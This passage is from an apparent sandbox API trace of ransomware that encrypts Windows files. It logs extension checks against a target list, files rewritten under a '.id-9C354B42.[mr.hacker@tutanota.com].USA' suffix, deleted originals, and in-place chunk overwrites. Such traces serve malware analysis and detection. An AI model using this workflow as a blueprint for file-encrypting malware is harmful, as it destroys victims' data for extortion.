(lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0054.724] lstrlenW (lpString=".dbf") returned 4 [0054.724] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1 [0054.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0054.724] lstrlenW (lpString=".1cd") returned 4 [0054.724] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1 [0054.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0054.724] lstrlenW (lpString=".jpg") returned 4 [0054.724] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1 [0054.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0054.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0054.725] lstrlenW (lpString=".doc") returned 4 [0054.725] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1 [0054.725] lstrlenW (lpString=".docx") returned 5 [0054.725] lstrcmpiW (lpString1=".docx", lpString2="2.CFG") returned -1 [0054.725] lstrlenW (lpString=".pdf") returned 4 [0054.725] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1 [0054.725] lstrlenW (lpString=".xls") returned 4 [0054.725] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1 [0054.725] lstrlenW (lpString=".xlsx") returned 5 [0054.725] lstrcmpiW (lpString1=".xlsx", lpString2="2.CFG") returned -1 [0054.725] lstrlenW (lpString=".ppt") returned 4 [0054.725] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1 [0054.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0054.725] lstrlenW (lpString=".zip") returned 4 [0054.725] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1 [0054.725] lstrlenW (lpString=".rar") returned 4 [0054.725] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1 [0054.725] lstrlenW (lpString=".bz2") returned 4 [0054.725] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1 [0054.725] lstrlenW (lpString=".7z") returned 3 [0054.725] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1 [0054.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0054.725] lstrlenW (lpString=".dbf") returned 4 [0054.725] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1 [0054.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0054.725] lstrlenW (lpString=".1cd") returned 4 [0054.725] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1 [0054.725] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0054.725] lstrlenW (lpString=".jpg") returned 4 [0054.725] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1 [0054.726] lstrcmpiW (lpString1=".FLT", lpString2=".USA") returned -1 [0054.726] lstrlenW (lpString="CGMIMP32.FLT") returned 12 [0054.726] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.726] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=323936) returned 1 [0054.727] CloseHandle (hObject=0x218) returned 1 [0054.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt")) returned 0x20 [0054.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.727] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.727] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0054.727] GetLastError () returned 0x0 [0054.727] ReadFile (in: hFile=0x218, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x4f160, lpOverlapped=0x0) returned 1 [0054.736] WriteFile (in: hFile=0x174, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0x4f170, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0x4f170, lpOverlapped=0x0) returned 1 [0054.742] ReadFile (in: hFile=0x218, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.742] WriteFile (in: hFile=0x174, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.742] SetEndOfFile (hFile=0x174) returned 1 [0054.742] CloseHandle (hObject=0x174) returned 1 [0054.742] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.742] SetEndOfFile (hFile=0x218) returned 1 [0054.745] CloseHandle (hObject=0x218) returned 1 [0054.745] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.746] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt")) returned 1 [0054.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0054.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0054.746] lstrlenW (lpString=".doc") returned 4 [0054.746] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0054.746] lstrlenW (lpString=".docx") returned 5 [0054.746] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0054.746] lstrlenW (lpString=".pdf") returned 4 [0054.746] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0054.746] lstrlenW (lpString=".xls") returned 4 [0054.746] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0054.746] lstrlenW (lpString=".xlsx") returned 5 [0054.746] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0054.746] lstrlenW (lpString=".ppt") returned 4 [0054.746] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0054.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0054.746] lstrlenW (lpString=".zip") returned 4 [0054.746] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0054.746] lstrlenW (lpString=".rar") returned 4 [0054.746] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0054.746] lstrlenW (lpString=".bz2") returned 4 [0054.746] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0054.746] lstrlenW (lpString=".7z") returned 3 [0054.746] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0054.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0054.747] lstrlenW (lpString=".dbf") returned 4 [0054.747] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0054.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0054.747] lstrlenW (lpString=".1cd") returned 4 [0054.747] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0054.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0054.747] lstrlenW (lpString=".jpg") returned 4 [0054.747] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0054.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0054.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0054.747] lstrlenW (lpString=".doc") returned 4 [0054.747] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0054.747] lstrlenW (lpString=".docx") returned 5 [0054.747] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0054.747] lstrlenW (lpString=".pdf") returned 4 [0054.747] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0054.747] lstrlenW (lpString=".xls") returned 4 [0054.747] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0054.747] lstrlenW (lpString=".xlsx") returned 5 [0054.747] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0054.747] lstrlenW (lpString=".ppt") returned 4 [0054.747] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0054.747] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0054.747] lstrlenW (lpString=".zip") returned 4 [0054.747] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0054.747] lstrlenW (lpString=".rar") returned 4 [0054.747] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0054.747] lstrlenW (lpString=".bz2") returned 4 [0054.747] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0054.747] lstrlenW (lpString=".7z") returned 3 [0054.747] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0054.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0054.748] lstrlenW (lpString=".dbf") returned 4 [0054.748] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0054.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0054.748] lstrlenW (lpString=".1cd") returned 4 [0054.748] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0054.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 67 [0054.748] lstrlenW (lpString=".jpg") returned 4 [0054.748] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0054.748] lstrcmpiW (lpString1=".FNT", lpString2=".USA") returned -1 [0054.748] lstrlenW (lpString="CGMIMP32.FNT") returned 12 [0054.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.749] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=606062) returned 1 [0054.749] CloseHandle (hObject=0x218) returned 1 [0054.749] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt")) returned 0x20 [0054.749] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0054.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0054.749] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.749] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0054.750] GetLastError () returned 0x0 [0054.750] ReadFile (in: hFile=0x218, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x93f6e, lpOverlapped=0x0) returned 1 [0054.981] WriteFile (in: hFile=0x174, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0x93f70, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0x93f70, lpOverlapped=0x0) returned 1 [0054.992] ReadFile (in: hFile=0x218, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.992] WriteFile (in: hFile=0x174, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.992] SetEndOfFile (hFile=0x174) returned 1 [0054.992] CloseHandle (hObject=0x174) returned 1 [0054.992] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.992] SetEndOfFile (hFile=0x218) returned 1 [0054.997] CloseHandle (hObject=0x218) returned 1 [0054.998] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.998] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt")) returned 1 [0055.201] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0055.201] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0055.201] lstrlenW (lpString=".doc") returned 4 [0055.201] lstrcmpiW (lpString1=".doc", lpString2=".FNT") returned -1 [0055.201] lstrlenW (lpString=".docx") returned 5 [0055.203] lstrcmpiW (lpString1=".docx", lpString2="2.FNT") returned -1 [0055.203] lstrlenW (lpString=".pdf") returned 4 [0055.203] lstrcmpiW (lpString1=".pdf", lpString2=".FNT") returned 1 [0055.203] lstrlenW (lpString=".xls") returned 4 [0055.203] lstrcmpiW (lpString1=".xls", lpString2=".FNT") returned 1 [0055.203] lstrlenW (lpString=".xlsx") returned 5 [0055.204] lstrcmpiW (lpString1=".xlsx", lpString2="2.FNT") returned -1 [0055.204] lstrlenW (lpString=".ppt") returned 4 [0055.204] lstrcmpiW (lpString1=".ppt", lpString2=".FNT") returned 1 [0055.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0055.220] lstrlenW (lpString=".zip") returned 4 [0055.220] lstrcmpiW (lpString1=".zip", lpString2=".FNT") returned 1 [0055.220] lstrlenW (lpString=".rar") returned 4 [0055.220] lstrcmpiW (lpString1=".rar", lpString2=".FNT") returned 1 [0055.220] lstrlenW (lpString=".bz2") returned 4 [0055.220] lstrcmpiW (lpString1=".bz2", lpString2=".FNT") returned -1 [0055.220] lstrlenW (lpString=".7z") returned 3 [0055.220] lstrcmpiW (lpString1=".7z", lpString2="FNT") returned -1 [0055.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0055.220] lstrlenW (lpString=".dbf") returned 4 [0055.220] lstrcmpiW (lpString1=".dbf", lpString2=".FNT") returned -1 [0055.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0055.220] lstrlenW (lpString=".1cd") returned 4 [0055.220] lstrcmpiW (lpString1=".1cd", lpString2=".FNT") returned -1 [0055.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0055.220] lstrlenW (lpString=".jpg") returned 4 [0055.220] lstrcmpiW (lpString1=".jpg", lpString2=".FNT") returned 1 [0055.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0055.220] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0055.220] lstrlenW (lpString=".doc") returned 4 [0055.220] lstrcmpiW (lpString1=".doc", lpString2=".FNT") returned -1 [0055.220] lstrlenW (lpString=".docx") returned 5 [0055.221] lstrcmpiW (lpString1=".docx", lpString2="2.FNT") returned -1 [0055.221] lstrlenW (lpString=".pdf") returned 4 [0055.221] lstrcmpiW (lpString1=".pdf", lpString2=".FNT") returned 1 [0055.221] lstrlenW (lpString=".xls") returned 4 [0055.221] lstrcmpiW (lpString1=".xls", lpString2=".FNT") returned 1 [0055.221] lstrlenW (lpString=".xlsx") returned 5 [0055.221] lstrcmpiW (lpString1=".xlsx", lpString2="2.FNT") returned -1 [0055.221] lstrlenW (lpString=".ppt") returned 4 [0055.221] lstrcmpiW (lpString1=".ppt", lpString2=".FNT") returned 1 [0055.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0055.221] lstrlenW (lpString=".zip") returned 4 [0055.221] lstrcmpiW (lpString1=".zip", lpString2=".FNT") returned 1 [0055.221] lstrlenW (lpString=".rar") returned 4 [0055.221] lstrcmpiW (lpString1=".rar", lpString2=".FNT") returned 1 [0055.221] lstrlenW (lpString=".bz2") returned 4 [0055.221] lstrcmpiW (lpString1=".bz2", lpString2=".FNT") returned -1 [0055.221] lstrlenW (lpString=".7z") returned 3 [0055.221] lstrcmpiW (lpString1=".7z", lpString2="FNT") returned -1 [0055.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0055.221] lstrlenW (lpString=".dbf") returned 4 [0055.221] lstrcmpiW (lpString1=".dbf", lpString2=".FNT") returned -1 [0055.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0055.221] lstrlenW (lpString=".1cd") returned 4 [0055.221] lstrcmpiW (lpString1=".1cd", lpString2=".FNT") returned -1 [0055.221] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 67 [0055.221] lstrlenW (lpString=".jpg") returned 4 [0055.221] lstrcmpiW (lpString1=".jpg", lpString2=".FNT") returned 1 [0055.221] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0055.221] lstrlenW (lpString="ITIRCL55.DLL") returned 12 [0055.222] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0056.614] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=1831424) returned 1 [0056.614] CloseHandle (hObject=0x1f8) returned 1 [0056.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll")) returned 0x20 [0056.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.614] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0056.615] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\itircl55.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0056.616] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0056.616] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0056.616] ReadFile (in: hFile=0x1f8, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0056.622] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x950aa, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0056.622] ReadFile (in: hFile=0x1f8, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0056.628] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0056.628] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x17f200, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0056.628] ReadFile (in: hFile=0x1f8, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0056.648] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.648] WriteFile (in: hFile=0x1f8, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0056.813] SetEndOfFile (hFile=0x1f8) returned 1 [0056.963] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x40270f0 [0056.990] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0056.990] WriteFile (in: hFile=0x1f8, lpBuffer=0x40270f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x40270f0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0056.991] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x950aa, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0056.991] WriteFile (in: hFile=0x1f8, lpBuffer=0x40270f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x40270f0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0056.993] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x17f200, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0056.993] WriteFile (in: hFile=0x1f8, lpBuffer=0x40270f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x40270f0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0056.995] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40270f0 | out: hHeap=0x5d0000) returned 1 [0056.995] CloseHandle (hObject=0x1f8) returned 1 [0056.995] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0056.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0056.995] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0056.996] lstrlenW (lpString=".doc") returned 4 [0056.996] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 